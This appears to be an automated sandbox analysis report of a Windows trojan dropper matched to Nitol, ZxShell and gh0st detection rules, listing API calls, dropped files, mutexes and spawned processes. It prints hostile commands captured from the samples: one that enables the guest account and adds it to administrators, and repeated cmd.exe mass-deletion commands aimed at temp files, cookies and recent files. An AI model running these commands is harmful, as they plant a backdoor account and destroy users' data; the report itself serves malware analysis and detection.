Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: 8_2_1000FA20 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard, 8_2_1000FA20
Source: C:\Windows\Temp\server.exe Code function: 3_2_1000FA90 OpenClipboard,GetClipboardData,CloseClipboard,GlobalSize,GlobalLock,??2@YAPAXI@Z,GlobalUnlock,CloseClipboard,??3@YAXPAX@Z, 3_2_1000FA90
Source: C:\Windows\Temp\server.exe Code function: 3_2_10009A00 GetKeyState,Sleep,lstrlen,GetKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,lstrcat,lstrlen,lstrcat,lstrcat, 3_2_10009A00
Source: C:\Windows\Temp\ .exe Code function: 5_2_00457B94 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 5_2_00457B94

E-Banking Fraud

Source: C:\Windows\Temp\server.exe Code function: RegOpenKeyExA,RegQueryValueA,RegCloseKey,Sleep,lstrlen,strstr,lstrcpy,CreateProcessA, Applications\iexplore.exe\shell\open\command 3_2_1000A6B0
Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: RegOpenKeyExA,RegQueryValueA,RegCloseKey,Sleep,lstrlen,strstr,lstrcpy,CreateProcessA, Applications\iexplore.exe\shell\open\command 8_2_1000A6B0
Source: cmd.exe Process created: 65

System Summary

Source: dump.pcap, type: PCAP Matched rule: gh0st Author: https://github.com/jackcr/
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader Author: Florian Roth
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects a ZxShell related sample from a CN threat group Author: Florian Roth
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader Author: Florian Roth
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects a ZxShell related sample from a CN threat group Author: Florian Roth
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: gh0st Author: https://github.com/jackcr/
Source: 00000003.00000002.2705358503.0000000002A5D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY Matched rule: gh0st Author: https://github.com/jackcr/
Source: C:\Windows\Temp\server.exe Code function: 3_2_10002800 NtdllDefWindowProc_A, 3_2_10002800
Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: 8_2_10002800 NtdllDefWindowProc_A, 8_2_10002800
Source: C:\Windows\Temp\ .exe Code function: 5_2_0042E150: DeviceIoControl, 5_2_0042E150
Source: C:\Windows\Temp\v5.exe Code function: 2_2_0040351A OpenSCManagerA,OpenServiceA,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle, 2_2_0040351A
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Code function: 0_2_004030CB EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_004030CB
Source: C:\Windows\Temp\server.exe Code function: 3_2_10012010 ExitWindowsEx, 3_2_10012010
Source: C:\Windows\Temp\server.exe Code function: 3_2_1000B0F0 _strrev,_strrev,_strrev,GetVersionExA,ExitWindowsEx, 3_2_1000B0F0
Source: C:\Windows\Temp\ .exe Code function: 5_2_0043A500 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx, 5_2_0043A500
Source: C:\Windows\Temp\ .exe Code function: 5_2_0043AD30 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx, 5_2_0043AD30
Source: C:\Windows\Temp\ .exe Code function: 5_2_0043ADF0 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx, 5_2_0043ADF0
Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: 8_2_10012010 ExitWindowsEx, 8_2_10012010
Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: 8_2_1000B0F0 _strrev,_strrev,_strrev,GetVersionExA,ExitWindowsEx, 8_2_1000B0F0
Source: C:\Windows\Temp\server.exe File created: C:\Windows\XXXXXX05CA35CC
Source: C:\Windows\Temp\server.exe File created: C:\Windows\XXXXXX05CA35CC\svchsot.exe
Source: C:\Windows\Temp\server.exe File created: C:\Windows\SysWOW64\05CA35CC
Source: C:\Windows\Temp\server.exe File created: C:\Windows\SysWOW64\033726
Source: C:\Windows\Temp\server.exe File created: C:\Windows\SysWOW64\033726\svchost.exe
Source: C:\Windows\Temp\server.exe File created: C:\Windows\SysWOW64\033726\RCX773C.tmp
Source: C:\Windows\Temp\server.exe File created: C:\Windows\kk
Source: C:\Windows\Temp\server.exe File created: C:\Windows\tt
Source: C:\Windows\Temp\server.exe File created: C:\Windows\bb
Source: C:\Windows\SysWOW64\033726\svchost.exe File created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==
Source: C:\Windows\SysWOW64\033726\svchost.exe File created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
Source: C:\Windows\SysWOW64\033726\svchost.exe File created: C:\Windows\SysWOW64\034031
Source: C:\Windows\SysWOW64\033726\svchost.exe File created: C:\Windows\SysWOW64\034031\svchost.exe
Source: C:\Windows\SysWOW64\033726\svchost.exe File created: C:\Windows\SysWOW64\034031\RCX8B31.tmp
Source: C:\Windows\Temp\ .exe Code function: String function: 00401B10 appears 2588 times
Source: C:\Windows\Temp\ .exe Code function: String function: 0044991C appears 59 times
Source: C:\Windows\Temp\ .exe Code function: String function: 00456F8E appears 53 times
Source: C:\Windows\Temp\ .exe Code function: String function: 00454F3B appears 2661 times
Source: C:\Windows\Temp\ .exe Code function: String function: 00459697 appears 31 times
Source: C:\Windows\Temp\ .exe Code function: String function: 004483B0 appears 122 times
Source: G3izWAY3Fa.exe, 00000000.00000002.1327850381.000000000297D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSystemTool.exe8 vs G3izWAY3Fa.exe
Source: G3izWAY3Fa.exe, 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSystemTool.exe8 vs G3izWAY3Fa.exe
Source: G3izWAY3Fa.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: dump.pcap, type: PCAP Matched rule: gh0st author = https://github.com/jackcr/
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: ZxShell_Related_Malware_CN_Group_Jul17_2 date = 2017-07-08, hash1 = 204273675526649b7243ee48efbb7e2bc05239f7f9015fbc4fb65f0ada64759e, author = Florian Roth, description = Detects a ZxShell related sample from a CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: ZxShell_Related_Malware_CN_Group_Jul17_2 date = 2017-07-08, hash1 = 204273675526649b7243ee48efbb7e2bc05239f7f9015fbc4fb65f0ada64759e, author = Florian Roth, description = Detects a ZxShell related sample from a CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: gh0st author = https://github.com/jackcr/
Source: 00000003.00000002.2705358503.0000000002A5D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY Matched rule: gh0st author = https://github.com/jackcr/
Source: v5.exe, 00000002.00000002.1330252488.000000000075A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: u.sLN
Source: classification engine Classification label: mal84.spre.bank.troj.spyw.evad.winEXE@113/11@12/4
Source: C:\Windows\Temp\server.exe Code function: 3_2_10011F80 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle, 3_2_10011F80
Source: C:\Windows\Temp\ .exe Code function: 5_2_0043A410 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,InitiateSystemShutdownA, 5_2_0043A410
Source: C:\Windows\Temp\ .exe Code function: 5_2_0043A500 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx, 5_2_0043A500
Source: C:\Windows\Temp\ .exe Code function: 5_2_0043AD30 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx, 5_2_0043AD30
Source: C:\Windows\Temp\ .exe Code function: 5_2_0043ADF0 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx, 5_2_0043ADF0
Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: 8_2_10011F80 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle, 8_2_10011F80
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Code function: 0_2_004041CD GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_004041CD
Source: C:\Windows\Temp\server.exe Code function: 3_2_100018A0 wsprintfA,CreateToolhelp32Snapshot,Process32First,_strcmpi,GetCurrentProcessId,OpenProcess,GetModuleFileNameExA,K32GetModuleFileNameExA,_strcmpi,CloseHandle,Process32Next,CloseHandle, 3_2_100018A0
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Code function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar, 0_2_00402020
Source: C:\Windows\Temp\v5.exe Code function: 2_2_00405244 LoadLibraryA,6D0C6DE0,FindResourceA,LoadResource,LockResource,wsprintfA,WriteFile,WriteFile,SetFilePointer,lstrlen,WriteFile,CloseHandle, 2_2_00405244
Source: C:\Windows\Temp\v5.exe Code function: 2_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess, 2_2_0040597D
Source: C:\Windows\Temp\v5.exe Code function: 2_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess, 2_2_0040597D
Source: C:\Windows\Temp\v5.exe Code function: 4_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess, 4_2_0040597D
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2376:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7008:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5420:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03
Source: C:\Windows\SysWOW64\033726\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\AAAAAA9PT0vfT4rqenp70A/Pqpp6+vr58= BBBBBB9PT0vf4Fr7K0sr0A/Pqpp6+vr58= CCCCCC9PT0vQXpr7K0sr0A/Pqpp6+vr58= GGGGGG4wIF/vL7858= XXXXXX579E5A5B VVVVVVrr2unw==
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2524:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:604:120:WilError_03
Source: C:\Windows\Temp\server.exe Mutant created: \Sessions\1\BaseNamedObjects\AAAAAArrGvvbOnvbCzvbGwsKmnr6+vnw==
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3184:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6908:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7224:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4084:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
Source: C:\Windows\Temp\v5.exe Mutant created: \BaseNamedObjects\Defghi Klmnopqr Tuv
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:660:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2440:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1044:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3736:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2148:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3280:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5764:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7232:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1380:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_03
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe File created: C:\Users\user\AppData\Local\Temp\nswC4F8.tmp
Source: G3izWAY3Fa.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: G3izWAY3Fa.exe Virustotal: Detection: 70%
Source: G3izWAY3Fa.exe ReversingLabs: Detection: 86%
Source: server.exe String found in binary or memory: cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add
Source: svchost.exe String found in binary or memory: cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe File read: C:\Users\user\Desktop\G3izWAY3Fa.exe
Source: unknown Process created: C:\Users\user\Desktop\G3izWAY3Fa.exe "C:\Users\user\Desktop\G3izWAY3Fa.exe"
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Process created: C:\Windows\Temp\v5.exe "C:\Windows\temp\v5.exe"
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Process created: C:\Windows\Temp\server.exe "C:\Windows\temp\server.exe"
Source: unknown Process created: C:\Windows\Temp\v5.exe C:\Windows\temp\v5.exe
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Process created: C:\Windows\Temp\ .exe "C:\Windows\temp\ .exe"
Source: C:\Windows\Temp\v5.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\server.exe Process created: C:\Windows\SysWOW64\033726\svchost.exe "C:\Windows\system32\033726\svchost.exe"
Source: C:\Windows\SysWOW64\033726\svchost.exe Process created: C:\Windows\SysWOW64\034031\svchost.exe "C:\Windows\system32\034031\svchost.exe"
Source: unknown Process created: C:\Windows\XXXXXX05CA35CC\svchsot.exe "C:\Windows\XXXXXX05CA35CC\svchsot.exe"
Source: unknown Process created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe "C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe"
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
